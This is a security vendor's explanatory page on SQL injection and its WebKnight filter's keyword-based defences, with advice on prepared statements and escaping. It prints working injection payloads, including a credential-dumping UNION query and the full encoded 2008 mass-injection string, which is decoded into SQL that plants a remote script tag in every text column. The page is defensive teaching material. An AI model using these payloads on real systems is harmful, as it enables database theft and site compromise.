Logo
Info Security
News
Advisories
 
WebKnight
Features
Download
Support
SQL Injection
Robots
Hot Linking
DoS
Blocklists
Googlebot Verifier
Testimonials
 
Log Analysis
Features
Download
Manual
 
Databases
User Agents
Http Headers
 
Members
Login
 

AQTRONiX WebKnight - SQL Injection

WebKnight Banner
Introduction

SQL injection (SQLi) is exploiting the lack of input validation in an application (e.g. web site) to compromise the database/server behind it.

A lot of programmers use the input provided by the user to build their SQL queries. If you accept input as valid and run it against a database system, it will be executed as it is. Example: user gives this input in a search field: 

'; drop table Orders--
The application now builds its query to run against the database. 
SQL = "SELECT * FROM Products WHERE Name='" & userinput & "'"
making this: 
SQL = "SELECT * FROM Products WHERE Name=''; drop table Orders--'"
Well, say bye to your orders if this is run against the database. The user provided a single quote which closes the string in your query. The rest is then seen as valid SQL and will be executed. The trailing -- is the symbol for comment (on SQL Server), so it makes sure the last single quote is not seen by SQL Server, and thus not giving any error: the statement will be executed.

SQL injection can be even more complex than this and it is not only on SQL Server: every database platform is a possible target and the solution is not always the same, except for the fact that you should not handle input provided by the user as valid.

Coding Practices

You cannot protect against these types of attack by installing a patch. This kind of attack has nothing to do with the operating system, database management system, it has everything to do with the end-user application: the application you expose to your users. This could mean everyone (in case of a web site on the Internet).

Most programming languages have built-in libraries that are now safe for SQL injection. They use prepared statements, where the statement is sent using a special character in the SQL-statement (like '?') to specify a parameter. The parameters are then sent separately to the database engine.

If your programming language does not support prepared statements, you should do input validation and check if a string is really a string and no escaping (single quote) is done. You could do this for strings: 

"SELECT * FROM Products WHERE Name='" & Replace(userinput,"'","''") & "'"
For most databases this is not sufficient enough. There are probably more characters that have a special meaning and can escape from the string literal. For MySQL and PHP use the function :
mysql_real_escape_string()
For numeric values you should check if it is really numeric: 
If IsNumeric(userinput) Then
In PHP you can use the function: 
intval()

WebKnight Protection

For web applications, WebKnight provides protection against SQL injection by installing itself as an ISAPI filter in IIS and scanning the querystring, headers, cookie and postdata for SQL injection attempts. It does this by using a customizable dictionary of SQL keywords (this dictionary can be found in the section SQL Injection of the WebKnight configuration). You can add or remove specific keywords and when 2 or more keywords are found an alert like this will be triggered: 

BLOCKED: Possible SQL injection in headers
BLOCKED: Possible SQL injection in cookie
BLOCKED: Possible SQL injection in querystring
BLOCKED: Possible SQL injection in data

Some of the most seen SQL injection attempts: 

[key]=[value]'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''='
id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,
0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1
May 2008: this one below is used in the famous mass SQL injection of many web servers around the world: 
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C0061007200650020004
0006D00200076006100720063006800610072002800380030003000300029003B0073006500740020
0040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B00270
07500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D0073006500
74005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400720069006D0028006
3006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E
0061006D0065002B002700290029002B00270027003C0073006300720069007000740020007300720
063003D00220068007400740070003A002F002F006500612E610061002E006E00650074002F003000
2E006A00730022003E003C002F007300630072006900700074003E00270027003B002700200066007
2006F006D002000640062006F002E007300790073006F0062006A006500630074007300200061002C
00640062006F002E0073007900730063006F006C0075006D006E007300200062002C00640062006F0
02E007300790073007400790070006500730020006300200077006800650072006500200061002E00
690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D002
7005500270061006E006400200062002E00780074007900700065003D0063002E0078007400790070
006500200061006E006400200063002E006E0061006D0065003D00270076006100720063006800610
0720027003B00730065007400200040006D003D005200450056004500520053004500280040006D00
29003B00730065007400200040006D003D0073007500620073007400720069006E006700280040006
D002C0050004100540049004E004400450058002800270025003B00250027002C0040006D0029002C
00380030003000300029003B00730065007400200040006D003D00520045005600450052005300450
0280040006D0029003B006500780065006300280040006D0029003B00%20AS%20NVARCHAR(4000));
EXEC(@S);--
The CAST in this last one actually translates to this and it appends a html script tag with a link to a javascript file into every varchar (text) field in the database: 
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=
rtrim(convert(varchar,'+b.name+'))+''
<script src="http://badurl/0.js"></script>'';'
from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id 
and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
set @m=REVERSE(@m); 
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

Data Leakage Prevention

Even when the protection of WebKnight against SQLi would fail, it is still possible to protect your database using the Information Disclosure rule.

  • In the section Response Monitor of the WebKnight configuration set the rule Information Disclosure to Block IP.
  • Add the unique password or hashed password of the first record of your accounts/customers table to the list of items in the Information Disclosure rule.
  • Optionally add unique strings found in other tables to the list of Information Disclosure.

Whenever someone is trying to download your database containing these unique strings, WebKnight will now trigger an alert and block the IP address. It is recommended to monitor the log for these alerts as it indicates much bigger issues with your website.

Published: 20/08/2002Document Type: General
Last modified: 22/12/2023Target: Programmer
Visibility: PublicLanguage: English

[top] Print Edit
AQTRONiX
Serious about Security
Copyright © 2024 AQTRONiX. All rights reserved.